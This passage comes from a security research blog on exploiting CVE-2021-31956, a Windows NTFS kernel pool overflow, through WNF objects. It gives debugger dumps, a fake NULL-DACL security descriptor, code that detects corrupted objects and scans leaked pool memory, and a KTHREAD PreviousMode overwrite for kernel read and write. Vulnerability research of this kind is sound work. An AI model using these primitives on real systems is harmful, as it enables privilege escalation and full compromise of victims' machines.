   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : 0x61616161`62626262 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : 0xffff8d87`686c8088 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : 1
   +0x068 PermanentDataStore : (null) 
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY [ 0xffffdd09`b35c8398 - 0xffffdd09`b35c8398 ]
   +0x088 TemporaryNameListEntry : _LIST_ENTRY [ 0xffffdd09`b35c8ee8 - 0xffffdd09`b35c85e8 ]
   +0x098 CreatorProcess   : 0xffff8d87`686c8080 _EPROCESS
   +0x0a0 DataSubscribersCount : 0n0
   +0x0a4 CurrentDeliveryCount : 0n0

For example, the StateData pointer has been modified to hold the address of an EPROCESS structure:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 ((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)
((ntkrnlmp!_WNF_STATE_DATA *)0xffff8d87686c8088)                 : 0xffff8d87686c8088 [Type: _WNF_STATE_DATA *]
    [+0x000] Header           [Type: _WNF_NODE_HEADER]
    [+0x004] AllocatedSize    : 0xffff8d87 [Type: unsigned long]
    [+0x008] DataSize         : 0x686c8088 [Type: unsigned long]
    [+0x00c] ChangeStamp      : 0xffff8d87 [Type: unsigned long]


PROCESS ffff8d87686c8080
    SessionId: 1  Cid: 1760    Peb: 100371000  ParentCid: 1210
    DirBase: 873d5000  ObjectTable: ffffdd09b2999380  HandleCount:  46.
    Image: TestEAOverflow.exe

I also made use of CVE-2021-31955 as a quick way to get hold of an EPROCESS address, as this was used within the in-the-wild exploit. However, with the primitives and flexibility of this overflow, it is expected that this would likely not be needed and that the issue could also be exploited at low integrity.

There are still some challenges here though, and it is not as simple as just overwriting the StateName with a value which you would like to look up.

StateName Corruption

For a successful StateName lookup, the internal state name needs to match the external name being queried.

At this stage it is worth going into the StateName lookup process in more depth.

As mentioned within Playing with the Windows Notification Facility, each _WNF_NAME_INSTANCE is sorted and put into an AVL tree based on its StateName.

There is the external version of the StateName which is the internal version of the StateName XOR’d with 0x41C64E6DA3BC0074.

For example, the external StateName value 0x41c64e6da36d9945 would become the following internally:

1: kd> dx -id 0,0,ffff8d87686c8080 -r1 (*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))
(*((ntkrnlmp!_WNF_STATE_NAME_STRUCT *)0xffffdd09b35c8348))                 [Type: _WNF_STATE_NAME_STRUCT]
    [+0x000 ( 3: 0)] Version          : 0x1 [Type: unsigned __int64]
    [+0x000 ( 5: 4)] NameLifetime     : 0x3 [Type: unsigned __int64]
    [+0x000 ( 9: 6)] DataScope        : 0x4 [Type: unsigned __int64]
    [+0x000 (10:10)] PermanentData    : 0x0 [Type: unsigned __int64]
    [+0x000 (63:11)] Sequence         : 0x1a33 [Type: unsigned __int64]
1: kd> dc 0xffffdd09b35c8348
ffffdd09`b35c8348  00d19931

Or in bitwise operations:

Version = InternalName & 0xf
LifeTime = (InternalName >> 4) & 0x3
DataScope = (InternalName >> 6) & 0xf
IsPermanent = (InternalName >> 0xa) & 0x1
Sequence = InternalName >> 0xb
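
The conversion and field extraction can be reproduced directly; a small sketch using the external value from the example above:

#include <stdio.h>

int main(void) {
    unsigned long long external = 0x41c64e6da36d9945ULL;
    unsigned long long internal = external ^ 0x41C64E6DA3BC0074ULL;   /* 0x00d19931 */

    printf("Version   = %llu\n", internal & 0xF);            /* 1 */
    printf("LifeTime  = %llu\n", (internal >> 4) & 0x3);     /* 3 = WnfTemporaryStateName */
    printf("DataScope = %llu\n", (internal >> 6) & 0xF);     /* 4 = WnfDataScopeMachine */
    printf("Permanent = %llu\n", (internal >> 0xA) & 0x1);   /* 0 */
    printf("Sequence  = 0x%llx\n", internal >> 0xB);         /* 0x1a33 */
    return 0;
}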

The key thing to realise here is that whilst Version, LifeTime, DataScope and Sequence are controlled, the Sequence number for WnfTemporaryStateName state names is stored in a global.

As you can see from the below, based on the DataScope, either the current Silo Globals or the Server Silo Globals structure is offset into to obtain v10, and this is then used as the Sequence, which is incremented by 1 each time.

Then, in order to look up a name instance, the following code path is taken:

i[3] in this case is actually the StateName of a _WNF_NAME_INSTANCE structure, as this is outside of the _RTL_BALANCED_NODE rooted off the NameSet member of a _WNF_SCOPE_INSTANCE structure.

Each of the _WNF_NAME_INSTANCE are joined together with the TreeLinks element. Therefore the tree traversal code above walks the AVL tree and uses it to find the correct StateName.

One challenge from a memory corruption perspective is that whilst you can determine the external and internal StateNames of the objects which have been heap sprayed, you don't necessarily know which of the objects will be adjacent to the NTFS chunk which is being overflowed.

However, with careful crafting of the pool overflow, we can guess the appropriate value to set the _WNF_NAME_INSTANCE structure’s StateName to be.

It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.

As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.

In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.

Security Descriptor

One other challenge I ran into whilst developing this exploit was due to the security descriptor.

Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.

Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.

Kernel space:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0xffff9e8253eca5a0)                 : 0xffff9e8253eca5a0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0x800c [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x28000200000014 [Type: void *]
    [+0x018] Sacl             : 0x14000000000001 [Type: _ACL *]
    [+0x020] Dacl             : 0x101001f0013 [Type: _ACL *]

After repointing the security descriptor to the userland structure:

1: kd> dx -id 0,0,ffffce86a715f300 -r1 ((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)
((ntkrnlmp!_SECURITY_DESCRIPTOR *)0x23ee3ab6ea0)                 : 0x23ee3ab6ea0 [Type: _SECURITY_DESCRIPTOR *]
    [+0x000] Revision         : 0x1 [Type: unsigned char]
    [+0x001] Sbz1             : 0x0 [Type: unsigned char]
    [+0x002] Control          : 0xc [Type: unsigned short]
    [+0x008] Owner            : 0x0 [Type: void *]
    [+0x010] Group            : 0x0 [Type: void *]
    [+0x018] Sacl             : 0x0 [Type: _ACL *]
    [+0x020] Dacl             : 0x23ee3ab4350 [Type: _ACL *]

I then attempted to provide a fake security descriptor with the same values. This didn't work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790, STATUS_ACCESS_DENIED).

Ok then! Let's just make the DACL NULL, so that the Everyone group has full control permissions.

After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:

SECURITY_DESCRIPTOR* sd = (SECURITY_DESCRIPTOR*)malloc(sizeof(SECURITY_DESCRIPTOR));
sd->Revision = 0x1;
sd->Sbz1 = 0;
sd->Control = 0x800c;   // SE_SELF_RELATIVE | SE_DACL_DEFAULTED | SE_DACL_PRESENT
sd->Owner = 0;
sd->Group = (PSID)0;
sd->Sacl = (PACL)0;
sd->Dacl = (PACL)0;     // DACL present but NULL: everyone is granted access

EPROCESS Corruption

Initially when testing out the arbitrary write, I was expecting that setting the StateData pointer to 0x6161616161616161 would cause a kernel crash near the memcpy location. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, it is caught and the NT status -1073741819 (STATUS_ACCESS_VIOLATION) is propagated back to userland. This made initial debugging more challenging, as the code around that function is a significantly hot path, and conditional breakpoints led to a huge system standstill.

Anyhow, typically after achieving an arbitrary write an attacker will leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.

As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.

To recap, the following conditions needed to be met:

1) The internal StateName must match up with the external StateName being looked up, so the corrupted _WNF_NAME_INSTANCE can still be found when required.
2) The Security Descriptor must pass the checks in ExpWnfCheckCallerAccess.
3) The DataSize and AllocatedSize values at the target location must be appropriate for the area of memory we wish to access.

So in summary, we have the following memory layout after the overflow has occurred, with the EPROCESS being treated as a _WNF_STATE_DATA:

We can then demonstrate corrupting the EPROCESS struct:

PROCESS ffff8881dc84e0c0
    SessionId: 1  Cid: 13fc    Peb: c2bb940000  ParentCid: 1184
    DirBase: 4444444444444444  ObjectTable: ffffc7843a65c500  HandleCount:  39.
    Image: TestEAOverflow.exe

PROCESS ffff8881dbfee0c0
    SessionId: 1  Cid: 073c    Peb: f143966000  ParentCid: 13fc
    DirBase: 135d92000  ObjectTable: ffffc7843a65ba40  HandleCount: 186.
    Image: conhost.exe

PROCESS ffff8881dc3560c0
    SessionId: 0  Cid: 0448    Peb: 825b82f000  ParentCid: 028c
    DirBase: 37daf000  ObjectTable: ffffc7843ec49100  HandleCount: 176.
    Image: WmiApSrv.exe

1: kd> dt _WNF_STATE_DATA ffffd68cef97a080+0x8
nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffffd68c
   +0x008 DataSize         : 0x100
   +0x00c ChangeStamp      : 2

1: kd> dc ffff8881dc84e0c0 L50
ffff8881`dc84e0c0  00000003 00000000 dc84e0c8 ffff8881  ................
ffff8881`dc84e0d0  00000100 41414142 44444444 44444444  ....BAAADDDDDDDD
ffff8881`dc84e0e0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e0f0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e100  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e110  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e120  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e130  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e140  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e150  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e160  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e170  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e180  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e190  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1a0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1b0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1c0  44444444 44444444 44444444 44444444  DDDDDDDDDDDDDDDD
ffff8881`dc84e1d0  44444444 44444444 00000000 00000000  DDDDDDDD........
ffff8881`dc84e1e0  00000000 00000000 00000000 00000000  ................
ffff8881`dc84e1f0  00000000 00000000 00000000 00000000  ................

As you can see, EPROCESS+0x8 has been corrupted with attacker-controlled data.

At this point typical approaches would be to either:

1) Target the KTHREAD structure’s PreviousMode member

2) Target the EPROCESS token

These approaches and their pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.

The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.

Summary

In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean-up and continuation.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions since 19H1, when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the use of the separate EPROCESS address leak vulnerability (CVE-2021-31955). This was also realised by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved an arbitrary write or kernel code execution, the aim will be to escalate privileges for their associated userland process or spawn a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure there is a Token member which represents the process’s security context and contains things such as the token privileges, token type, session id etc.

CVE-2021-31955 led to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to have been used by the in-the-wild attacks found by Kaspersky. However, in practice, for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to obtain a relative read/write primitive using a _WNF_STATE_DATA to read from and write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming for is as follows:

The difficulty with this is that low fragmentation heap (LFH) randomisation makes reliably achieving this memory layout more difficult, and iteration one of this exploit stayed away from the approach until more research was performed into improving general reliability and reducing the chance of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absence of an LFH "heap randomisation" weakness or vulnerability, this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary clean-ups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which, when added to the 0x10 header and the POOL_HEADER (0x10), also ends up as an allocated chunk of 0xC0).

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, since we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of freeing holes as in the previous article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow and make sure that only the following fields are overflowed by 0x10 bytes of data (plus the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeStamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know whether we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, we can trigger the overflow and then check for corruption by looping through and querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
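
For illustration, a minimal corruption-detection loop might look like the following. It assumes a g_StateNames array populated during the spray, a hand-declared prototype for the undocumented NtQueryWnfStateData export from ntdll, and that each sprayed object originally held 0xA0 bytes of data; none of these names are taken from the actual exploit.

#include <windows.h>
#include <winternl.h>

// Hand-declared prototype for the undocumented ntdll export (assumption: resolve
// it via GetProcAddress or link against ntdll.lib).
NTSTATUS NTAPI NtQueryWnfStateData(const ULONGLONG* StateName, const void* TypeId,
                                   const void* ExplicitScope, ULONG* ChangeStamp,
                                   void* Buffer, ULONG* BufferSize);

#define SPRAY_DATA_SIZE 0xA0

// Returns the index of the _WNF_STATE_DATA whose DataSize was corrupted by the
// overflow, or -1 if no corruption was detected and the spray should be retried.
int FindUnboundedStateData(const ULONGLONG* g_StateNames, ULONG count)
{
    for (ULONG i = 0; i < count; i++)
    {
        BYTE buffer[0x1000];
        ULONG size = sizeof(buffer);
        ULONG changeStamp = 0;

        NtQueryWnfStateData(&g_StateNames[i], NULL, NULL, &changeStamp, buffer, &size);

        // An unbounded object reports more data than the 0xA0 bytes we wrote.
        if (size > SPRAY_DATA_SIZE)
            return (int)i;
    }
    return -1;
}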

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects, but the pool segment also contains _WNF_NAME_INSTANCE objects because they need to be the same chunk size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATE_DATA containing chunk can be allocated within the final block of the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice, and increasing the spray size reduces the likelihood of it occurring (see the Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. From practical testing, performing a large spray before triggering the overflow means this rarely happens within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall, with 1 remediated and 2 and 3 occurring only very rarely, and in lieu of a perfect solution, we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above (and within the first blog post), we can use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData and ScopeInstance can be disclosed from the identified target object.
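
As a rough sketch (the offsets are taken from the _WNF_NAME_INSTANCE layout shown above, for the tested build; the leak buffer and struct name here are illustrative only), the scan and member extraction could look like:

#include <stddef.h>

// Members pulled out of a _WNF_NAME_INSTANCE located inside the relative-read leak.
typedef struct _LEAKED_NAME_INSTANCE {
    size_t             Offset;          // offset of the instance within the leak buffer
    unsigned long long StateName;       // +0x028
    unsigned long long ScopeInstance;   // +0x030
    unsigned long long StateData;       // +0x058
    unsigned long long CreatorProcess;  // +0x098
} LEAKED_NAME_INSTANCE;

// Scan the leaked bytes for the 03 09 A8 node header (NodeTypeCode 0x0903,
// NodeByteSize 0x00A8) which denotes the start of a _WNF_NAME_INSTANCE.
int FindAdjacentNameInstance(const unsigned char* leak, size_t len, LEAKED_NAME_INSTANCE* out)
{
    for (size_t i = 0; i + 0xA0 <= len; i++)
    {
        if (leak[i] == 0x03 && leak[i + 1] == 0x09 && leak[i + 2] == 0xA8)
        {
            out->Offset         = i;
            out->StateName      = *(const unsigned long long*)(leak + i + 0x28);
            out->ScopeInstance  = *(const unsigned long long*)(leak + i + 0x30);
            out->StateData      = *(const unsigned long long*)(leak + i + 0x58);
            out->CreatorProcess = *(const unsigned long long*)(leak + i + 0x98);
            return 1;
        }
    }
    return 0;
}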

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize and DataSize fields preceding the data we wish to read or write.

In this case the aim was to achieve a full arbitrary read and write, but without the constraint of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory we wished to write to.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structures are used in order to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems: the hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer, which deals with general OS policy and operations. The kernel subsystem handles architecture-specific details for low-level operations, and the HAL provides an abstraction layer to deal with differences between hardware.

Processes and threads are represented at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS, and _ETHREAD and _KTHREAD, structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory, which is called from NtWriteVirtualMemory, we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written to:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this is correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
